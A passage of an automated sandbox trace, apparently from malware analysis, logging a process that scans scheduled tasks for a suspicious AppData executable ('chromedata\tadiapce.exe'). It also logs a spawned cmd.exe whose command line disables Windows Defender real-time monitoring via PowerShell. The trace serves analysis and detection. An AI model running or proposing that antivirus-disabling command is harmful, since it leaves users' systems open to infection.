	[0073.660] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.661] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.661] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.661] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.661] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2d, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.661] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fee0) returned 0x0
	[0073.661] IRegisteredTaskCollection:get_Count (in: This=0x55fee0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.661] IRegisteredTaskCollection:get_Item (in: This=0x55fee0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2048) returned 0x0
	[0073.661] IRegisteredTask:get_Name (in: This=0x22c2048, pName=0x128e3c | out: pName=0x128e3c*="Calibration Loader") returned 0x0
	[0073.661] IRegisteredTask:get_Xml (in: This=0x22c2048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\mscms.dll,-200)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\mscms.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\mscms.dll,-202)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"C3B270C8-8291-4326-92F6-2FF65DE39010\">\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n    <SessionStateChangeTrigger id=\"79B8DA54-F688-4a18-B2D4-7AA891A193E8\">\r\n      <Enabled>true</Enabled>\r\n      <StateChange>ConsoleConnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{B210D694-C8DF-490d-9576-9E20CDBC20BD}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.662] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\mscms.dll,-200)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\mscms.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\mscms.dll,-202)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"C3B270C8-8291-4326-92F6-2FF65DE39010\">\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n    <SessionStateChangeTrigger id=\"79B8DA54-F688-4a18-B2D4-7AA891A193E8\">\r\n      <Enabled>true</Enabled>\r\n      <StateChange>ConsoleConnect</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{B210D694-C8DF-490d-9576-9E20CDBC20BD}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.662] IUnknown:Release (This=0x22c2048) returned 0x0
	[0073.662] IUnknown:Release (This=0x55fee0) returned 0x0
	[0073.662] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fee0) returned 0x0
	[0073.663] ITaskFolderCollection:get_Count (in: This=0x55fee0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.663] IUnknown:Release (This=0x55fee0) returned 0x0
	[0073.663] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.663] IUnknown:Release (This=0x55fd98) returned 0x0
	[0073.663] TaskScheduler:IUnknown:Release (This=0x55fd38) returned 0x0
	[0073.663] ITaskFolderCollection:get_Item (in: This=0x5523f0, index=0x128f64*(varType=0x3, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppFolder=0x129084 | out: ppFolder=0x129084*=0x55fd38) returned 0x0
	[0073.663] ITaskFolder:GetTasks (in: This=0x55fd38, flags=1, ppTasks=0x128f58 | out: ppTasks=0x128f58*=0x55fda8) returned 0x0
	[0073.663] IRegisteredTaskCollection:get_Count (in: This=0x55fda8, pCount=0x128f48 | out: pCount=0x128f48*=1) returned 0x0
	[0073.663] IRegisteredTaskCollection:get_Item (in: This=0x55fda8, index=0x128e4c*(varType=0x3, wReserved1=0x12, wReserved2=0xfd38, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128f50 | out: ppRegisteredTask=0x128f50*=0x55fe70) returned 0x0
	[0073.663] IRegisteredTask:get_Name (in: This=0x55fe70, pName=0x128f54 | out: pName=0x128f54*="MP Scheduled Scan") returned 0x0
	[0073.663] IRegisteredTask:get_Xml (in: This=0x55fe70, pXml=0x128f5c | out: pXml=0x128f5c*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>Scheduled Scan</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2000-01-01T05:04:52</StartBoundary>\r\n      <EndBoundary>2100-01-01T00:00:00</EndBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT0H1M0S</Duration>\r\n      <WaitTimeout>PT4H0M0S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>c:\\program files\\windows defender\\MpCmdRun.exe</Command>\r\n      <Arguments>Scan -ScheduleJob -WinTask -RestrictPrivilegesScan</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.664] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>Scheduled Scan</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2000-01-01T05:04:52</StartBoundary>\r\n      <EndBoundary>2100-01-01T00:00:00</EndBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT0H1M0S</Duration>\r\n      <WaitTimeout>PT4H0M0S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>c:\\program files\\windows defender\\MpCmdRun.exe</Command>\r\n      <Arguments>Scan -ScheduleJob -WinTask -RestrictPrivilegesScan</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.664] IUnknown:Release (This=0x55fe70) returned 0x0
	[0073.664] IUnknown:Release (This=0x55fda8) returned 0x0
	[0073.664] ITaskFolder:GetFolders (in: This=0x55fd38, flags=0, ppFolders=0x128f4c | out: ppFolders=0x128f4c*=0x55fda8) returned 0x0
	[0073.664] ITaskFolderCollection:get_Count (in: This=0x55fda8, pCount=0x128f44 | out: pCount=0x128f44*=0) returned 0x0
	[0073.664] IUnknown:Release (This=0x55fda8) returned 0x0
	[0073.664] TaskScheduler:IUnknown:Release (This=0x55fd38) returned 0x0
	[0073.664] IUnknown:Release (This=0x5523f0) returned 0x0
	[0073.665] TaskScheduler:IUnknown:Release (This=0x5523a0) returned 0x0
	[0073.665] ITaskFolderCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x2, varVal2=0x76a63ea3), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x5523a0) returned 0x0
	[0073.665] ITaskFolder:GetTasks (in: This=0x5523a0, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x5523d0) returned 0x0
	[0073.665] IRegisteredTaskCollection:get_Count (in: This=0x5523d0, pCount=0x129060 | out: pCount=0x129060*=1) returned 0x0
	[0073.665] IRegisteredTaskCollection:get_Item (in: This=0x5523d0, index=0x128f64*(varType=0x3, wReserved1=0x12, wReserved2=0x23a0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x129068 | out: ppRegisteredTask=0x129068*=0x55fd38) returned 0x0
	[0073.665] IRegisteredTask:get_Name (in: This=0x55fd38, pName=0x12906c | out: pName=0x12906c*="SvcRestartTask") returned 0x0
	[0073.665] IRegisteredTask:get_Xml (in: This=0x55fd38, pXml=0x129074 | out: pXml=0x129074*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\osppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\osppc.dll,-200)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\osppc.dll,-201)</Description>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\sc.exe</Command>\r\n      <Arguments>start osppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.666] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\osppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\osppc.dll,-200)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\osppc.dll,-201)</Description>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\sc.exe</Command>\r\n      <Arguments>start osppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.666] IUnknown:Release (This=0x55fd38) returned 0x0
	[0073.666] IUnknown:Release (This=0x5523d0) returned 0x0
	[0073.666] ITaskFolder:GetFolders (in: This=0x5523a0, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x5523d0) returned 0x0
	[0073.667] ITaskFolderCollection:get_Count (in: This=0x5523d0, pCount=0x12905c | out: pCount=0x12905c*=0) returned 0x0
	[0073.667] IUnknown:Release (This=0x5523d0) returned 0x0
	[0073.667] TaskScheduler:IUnknown:Release (This=0x5523a0) returned 0x0
	[0073.667] ITaskFolderCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x3, varVal2=0x76a63ea3), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x5523a0) returned 0x0
	[0073.667] ITaskFolder:GetTasks (in: This=0x5523a0, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x5523e8) returned 0x0
	[0073.667] IRegisteredTaskCollection:get_Count (in: This=0x5523e8, pCount=0x129060 | out: pCount=0x129060*=0) returned 0x0
	[0073.667] IUnknown:Release (This=0x5523e8) returned 0x0
	[0073.667] ITaskFolder:GetFolders (in: This=0x5523a0, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x5523e8) returned 0x0
	[0073.668] ITaskFolderCollection:get_Count (in: This=0x5523e8, pCount=0x12905c | out: pCount=0x12905c*=0) returned 0x0
	[0073.668] IUnknown:Release (This=0x5523e8) returned 0x0
	[0073.668] TaskScheduler:IUnknown:Release (This=0x5523a0) returned 0x0
	[0073.668] IUnknown:Release (This=0x552948) returned 0x0
	[0073.668] IUnknown:Release (This=0x5522c0) returned 0x0
	[0073.668] TaskScheduler:IUnknown:Release (This=0x552918) returned 0x0
	[0073.668] RtlFreeHeap (HeapHandle=0x150000, Flags=0x8, BaseAddress=0x1c8598) returned 1
	[0073.668] CoUninitialize () 
	[0073.672] ExitProcess (uExitCode=0x0) 

Thread:
	id = 48
	os_tid = 0xfb4


Thread:
	id = 49
	os_tid = 0xfb8


Thread:
	id = 50
	os_tid = 0xfbc


Thread:
	id = 51
	os_tid = 0xfc0


Thread:
	id = 53
	os_tid = 0xfcc


Thread:
	id = 55
	os_tid = 0xfe0


Process:
	id = "16"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee176e0"
	os_pid = "0xfc4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "15"
	os_parent_pid = "0xfac"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 52
	os_tid = 0xfc8

	[0055.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18faa0 | out: lpSystemTimeAsFileTime=0x18faa0*(dwLowDateTime=0xc54f860, dwHighDateTime=0x1d50a6a)) 
	[0055.487] GetCurrentProcessId () returned 0xfc4
	[0055.487] GetCurrentThreadId () returned 0xfc8
	[0055.487] GetTickCount () returned 0xa666c1
	[0055.487] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa98 | out: lpPerformanceCount=0x18fa98*=12932478875) returned 1
	[0055.488] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000
	[0055.488] __set_app_type (_Type=0x1) 
	[0055.488] __p__fmode () returned 0x770231f4
	[0055.488] __p__commode () returned 0x770231fc
	[0055.488] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0
	[0055.488] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0
	[0055.488] GetCurrentThreadId () returned 0xfc8
	[0055.489] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc8) returned 0x38
	[0055.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0055.489] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0055.489] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0055.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0055.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fa30 | out: phkResult=0x18fa30*=0x0) returned 0x2
	[0055.489] VirtualQuery (in: lpAddress=0x18fa67, lpBuffer=0x18fa00, dwLength=0x1c | out: lpBuffer=0x18fa00*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0055.489] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fa00, dwLength=0x1c | out: lpBuffer=0x18fa00*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0055.489] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fa00, dwLength=0x1c | out: lpBuffer=0x18fa00*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0055.489] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fa00, dwLength=0x1c | out: lpBuffer=0x18fa00*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0055.489] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fa00, dwLength=0x1c | out: lpBuffer=0x18fa00*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0055.489] GetConsoleOutputCP () returned 0x1b5
	[0055.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0055.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1
	[0055.490] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0055.490] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0055.491] _get_osfhandle (_FileHandle=1) returned 0x7
	[0055.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0055.491] _get_osfhandle (_FileHandle=0) returned 0x3
	[0055.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0055.491] _get_osfhandle (_FileHandle=0) returned 0x3
	[0055.491] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0055.491] GetEnvironmentStringsW () returned 0x3602d8*
	[0055.491] GetProcessHeap () returned 0x350000
	[0055.491] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x8fa) returned 0x360be0
	[0055.492] FreeEnvironmentStringsW (penv=0x3602d8) returned 1
	[0055.492] GetProcessHeap () returned 0x350000
	[0055.492] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4) returned 0x35fbd8
	[0055.492] GetEnvironmentStringsW () returned 0x3602d8*
	[0055.492] GetProcessHeap () returned 0x350000
	[0055.492] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x8fa) returned 0x3614e8
	[0055.492] FreeEnvironmentStringsW (penv=0x3602d8) returned 1
	[0055.492] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e9a0 | out: phkResult=0x18e9a0*=0x40) returned 0x0
	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x0, lpData=0x18e9ac*=0x68, lpcbData=0x18e9a4*=0x1000) returned 0x2
	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x1, lpcbData=0x18e9a4*=0x4) returned 0x0
